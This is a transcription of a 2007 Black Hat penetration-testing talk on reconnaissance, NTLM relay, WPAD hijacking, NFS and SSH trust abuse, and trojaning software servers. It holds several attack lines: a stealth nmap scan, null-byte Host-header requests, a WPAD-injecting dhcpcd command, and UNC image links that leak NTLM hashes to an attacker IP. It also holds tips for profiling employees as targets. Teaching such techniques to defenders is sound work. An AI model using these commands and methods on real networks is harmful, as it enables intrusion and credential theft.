Tactical Exploitation the other way to pen-test

Transcription

1 Tactical Exploitation the other way to pen-test hdm / valsmith Black Hat USA 2007

2 who are we? H D Moore <hdm [at] metasploit.com> BreakingPoint Systems Metasploit Valsmith <valsmith [at] metasploit.com> Offensive Computing Metasploit

3 why listen? A different approach to pwning Lots of fun techniques, new tools Real-world tested ;-)

4 what do we cover? Target profiling Discovery tools and techniques Exploitation Getting you remote access

5 the tactical approach Vulnerabilites are transient Target the applications Target the processes Target the people Target the trusts You WILL gain access.

6 the tactical approach Crackers are opportunists Expand the scope of your tests Everything is fair game What you dont test... Someone else will!

7 the tactical approach Hacking is not about exploits The target is the data, not r00t Hacking is using what you have Passwords, trust relationships Service hijacking, auth tickets

8 personnel discovery Security is a people problem People write your software People secure your network Identify the meatware first

9 personnel discovery Identifying the meatware Google Newsgroups SensePost tools Evolution from Paterva.com

10 personnel discovery These tools give us Full names, usernames, Employment history Phone numbers Personal sites

11 personnel discovery

12 personnel discovery Started with company and jobs Found online personnel directory Found people with access to data Found resumes, addresses name = username = target

13 personnel discovery Joe Targetstein Works as lead engineer in semiconductor department address Old newsgroup postings show Now we have username and a host to target to go after semi conductor information

14 network discovery Identify your target assets Find unknown networks Find third-party hosts Dozens of great tools... Lets stick to the less-known ones

15 network discovery The overused old busted Whois, Google, zone transfers Reverse DNS lookups

16 network discovery The shiny new hotness Other people's services CentralOps.net, DigitalPoint.com DomainTools.com Paterva.com

17 network discovery DomainTools vs Defcon.org 1. Darktangent.net 0 listings0 listings0 listings 2. Defcon.net 0 listings0 listings0 listings 3. Defcon.org 1 listings18 listings 1 listings 4. Hackerjeopardy.com 0 listings0 listings0 listings 5. Hackerpoetry.com0 listings0 listings0 listings 6. Thedarktangent.com 0 listings0 listings0 listings 7. Thedarktangent.net 0 listings0 listings0 listings 8. Thedarktangent.org 0 listings0 listings0 listings

18 network discovery DomainTools vs Defcon.net 1. 0day.com 0 listings0 listings0 listings 2. 0day.net 0 listings0 listings0 listings 3. Darktangent.org 0 listings0 listings0 listings [ snipped personal domains ] 12. Securityzen.com 0 listings0 listings0 listings 13. Zeroday.com 0 listings0 listings0 listings

19 network discovery What does this get us? Proxied DNS probes, transfers List of virtual hosts for each IP Port scans, traceroutes, etc Gold mine of related info

20 network discovery Active discovery techniques Trigger SMTP bounces Brute force HTTP vhosts Watch outbound DNS Just the users!

21 network discovery Received: from unknown (HELO gateway1.rsasecurity.com) ( ) by [censored] with SMTP; 28 Jun :11: Received: from hyperion.rsasecurity.com by gateway1.rsasecurity.com via smtpd (for [censored]. [xxx.xxx.xxx.xxx]) with SMTP; Thu, 28 Jun :11: by hyperion.na.rsa.net (MOS GA) To: Subject: Returned mail: User unknown (from [ ]) Las Vegas August 2007

22 application discovery If the network is the toast... Applications are the butter. Each app is an entry point Finding these apps is the trick

23 application discovery Tons of great tools Nmap, Amap, Nikto, Nessus Commercial tools

24 application discovery Slow and steady wins the deface Scan for specific port, one port only IDS/IPS can't handle slow scans Ex. nmap -ss -P0 -T 0 -p 1433 ips

25 application discovery Example target had custom IDS to detect large # of host connections Standard nmap lit up IDS like XMAS One port slow scan never detected Know OS based on 1 port (139/22)

26 application discovery Target had internal app for software licensing / distribution ~10,000 nodes had app installed A couple of hours with IDA/Ollydbg showed static Admin password in app's memory All accessible nodes owned, 0 exploits used

27 application discovery Web Application Attack and Audit Framework W3AF: Metasploit for the web Metasploit 3 scanning modules Scanning mixin

28 application discovery DEMO

29 client app discovery Client applications are fun! Almost always exploitable Easy to fingerprint remotely Your last-chance entrance

30 client app discovery Common probe methods Mail links to the targets Review exposed web logs Send MDNs to specific victims Abuse all, everyone, team aliases

31 process discovery Track what your target does Activity via IP ID counters Last-modified headers FTP server statistics

32 process discovery Look for patterns of activity Large IP ID increments at night FTP stats at certain times Microsoft FTP SITE STATS Web pages being uploaded Check timestamps on images

33 process discovery Existing tools? None, really... Easy to script Use hping for IP ID tracking Use netcat for SITE STATS

34 process discovery ABOR : 2138 ACCT : 2 ALLO : 32 APPE : 74 CDUP : 5664 CWD : DELE : 1910 FEAT : 2970 HELP : 470 LIST : MDTM : MKD : 870 MODE : 3938 NLST : 1492 NOOP : OPTS : PASS : PASV : PORT : PWD : QUIT : REIN : 16 REST : RETR : RMD : 41 RNFR : 58 RNTO : 2 SITE : 2048 SIZE : SMNT : 16 STAT : STOR : 3035 STRU : 3299 SYST : TYPE : USER : XCWD : 67 XMKD : 12 XPWD : 1401 XRMD : 2 ftp.microsoft.com [node] SITE STATS / Uptime: 47 days

35 process discovery << backups run at midnight USA people wake up >> Las Vegas August 2007 IP ID Monitoring / HACKER.COM

36 15 Minute Break Come back for the exploits!

37 re-introduction In our last session... Discovery techniques and tools In this session... Compromising systems!

38 external network The crunchy candy shell Exposed hosts and services VPN and proxy services Client-initiated sessions

39 attacking ftp transfers Active FTP transfers Clients often expose data ports NAT + Active FTP = Firewall Hole Passive FTP transfers Data port hijacking: DoS at least pasvagg.pl still works just fine :-)

40 attacking web servers Brute force vhosts, files, dirs Source control files left in root

41 attacking web servers Apache Reverse Proxying GET /%00 HTTP/1.1 Host: realhost.com Apache Dynamic Virtual Hosting GET / HTTP/1.1 Host: %00/

42 load balancers Cause load balancer to leak internal IP information Use TCP half-close HTTP request Alteon ACEdirector good example

43 load balancers ACEdirector mishandles TCP halfclose requests Behavior can be used as signature for existence of Load Balancer Direct packets from real webserver fowarded back to client (with IP)

44 cgi case study Web Host with 1000's of sites Had demo CGI for customers CGI had directory traversal CGI executable + writable on every directory Common on web hosts! Las Vegas August 2007

45 cgi case study Enumerated: Usernames Dirs Backup files Other CGI scripts VHOSTS

46 cgi case study Target happened to run solaris Solaris treats dirs as files cat /dirname = ls /dirname

47 cgi case study Found CGI script names Googled for vulns Gained shell 100's of different ways Owned due to variety of layered configuration issues

48 attacking dns servers Brute force host names XID sequence analysis BIND 9: PRNG / Birthday VxWorks: XID = XID + 1 Return extra answers in response

49 authentication relays SMB/CIFS clients are fun! Steal hashes, redirect, MITM NTLM relay between protocols SMB/HTTP/SMTP/POP3/IMAP More on this later...

50 social engineering Give away free toys CDROMs, USB keys, N800s Replace UPS with OpenWRT Cheap and easy to make

51 internal network The soft chewy center This is the fun part :) Easy to trick clients

52 netbios services NetBIOS names are magic WPAD CALICENSE

53 dns services Microsoft DNS + DHCP = fun Inject host names into DNS Hijack the entire network dhcpcd -h WPAD -i eth0

54 Hijacking NTLM Quickly own all local workstations Gain access to mail and web sites A new twist on smbrelay2.cpp Yes, it was released in Now implemented in Metasploit 3

55 Hijacking NTLM 1. MITM all outbound web traffic Cache poison the WPAD host Plain old ARP spoofing DHCP / NetBIOS + WPAD Run a rogue WiFi access point Manipulate TOR connections

56 Hijacking NTLM 2. Redirect HTTP requests to intranet WPAD + SOCKS server SQUID + transparent proxying 302 Redirect

57 Hijacking NTLM 3. Return HTML page with UNC link IE 5/6/7: <img src= \\ip\share\i.jpg > Firefox: mozicon-url:file:////ip/share/i.jpg Third-party plugins: Adobe PDF Viewer Windows Media Player Microsoft Office

58 Hijacking NTLM 4. Accept SMB connection and relay Accept connection from the client Connect to the target server (or client) Ask target for Challenge Key Provide this Key to the client Allow the client to authenticate

59 Hijacking NTLM 5. Executing remote code Disconnect the client Use authenticated session ADMIN$ + Service Control Manager Access data, call RPC routines, etc Access the remote registry

60 Hijacking NTLM DEMO

61 file servers NAS appliances are safe and secure Don't worry, the vendor sure doesn't Unpatched Samba daemons Snap, TeraServer, OS X, etc. Inconsistent file permissions AFP vs NFS vs SMB

62 samba is awesome 1999 called, want their bugs back Remember those scary NULL Sessions Samba ENUM / SID2USR user listing Massive information leaks via DCERPC Shares, Users, Policies Brute force accounts (no lockout)

63 smb case study Old bugs back to haunt new boxes Found OS X Box running SMB User sent mail touting OS X sec Previous scans had found vulns User: false positive, its OS X Us: Owned

64 smb case study Performed Null Session net use \\osxsmb\ipc$ /user: Enumerated users and shares Brute forced several user accounts Got shell, escalated to root User: but..but.. its OS X!

65 samba vs metasploit Metasploit modules for Samba Linux (vsyscall + Targets) Mac OS X (PPC/x86) Solaris (SPARC,x86) Auxiliary PoCs

66 nfs services NFS is your friend Dont forget its easy cousin NIS Scan for port 111 / 2049 showmount -e / showmount -a Whats exported, whose mounting?

67 nfs services Exported NFS home directories Important target! If you get control Own every node that mounts it

68 nfs services If you are root on home server Become anyone (NIS/su) Harvest known_hosts files Harvest allowed_keys Modify.login, etc. + insert trojans

69 nfs services Software distro servers are fun! All nodes access over NFS Write to software distro directories Trojan every node at once No exploits needed!

70 file services Example: all nodes were diskless / patched Clients got software from NFS server We hacked the software server Using trust hijacking explained later Inserted trojaned gnu binaries 1000's of nodes sent us shells

71 trust relationships The target is unavailable to YOU Not to another host you can reach... Networks may not trust everyone But they often trust each other :)

72 trusts Deal with firewalls/tcp wrappers/acls Find a node that is accepted and own it People wrapper Unix and leave Windows open Hack the Windows box and port forward past wrappers

73 trusts Example: Mixed network with Unix wrapperd Target Solaris homedir server Had auth credentials but couldn't reach port 22 Found 1 vulnerable win box, owned / installed portfworward to homedir port 22 Las Vegas August 2007

74 Hijacking SSH Idea is to abuse legitimate users access over SSH If user can access other systems, why can't you? (even without users password) One time passwords? No problem! Intel gathering

75 Hijacking SSH Available tools Metalstorm ssh hijacking Trojaned ssh clients SSH master modes Dont for get TTY hijacking Appcap TTYWatcher Who suspects a dead SSH session?

76 Hijacking SSH DEMO

77 Hijacking Kerberos Kerberos is great for one time authentication.. even for hackers Idea is to become a user and hijack kerberos tickets Gain access to other trusted nodes Las Vegas August 2007

78 Hijacking Kerberos DEMO

79 Conclusion Compromise a secure network Determination + creativity wins Tools cannot replace talent.